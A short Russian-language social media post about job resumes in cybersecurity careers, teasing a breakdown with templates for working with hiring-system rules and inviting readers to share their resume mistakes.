Система кривая? Да. Но почему бы не использовать её правила в свою пользу?

Детальный разбор с примерами и шаблонами

Кстати, а у вас какие фейлы были с резюме? Делитесь в комментах! 🤔

#резюме #кибербезопасность #карьера #hr #soc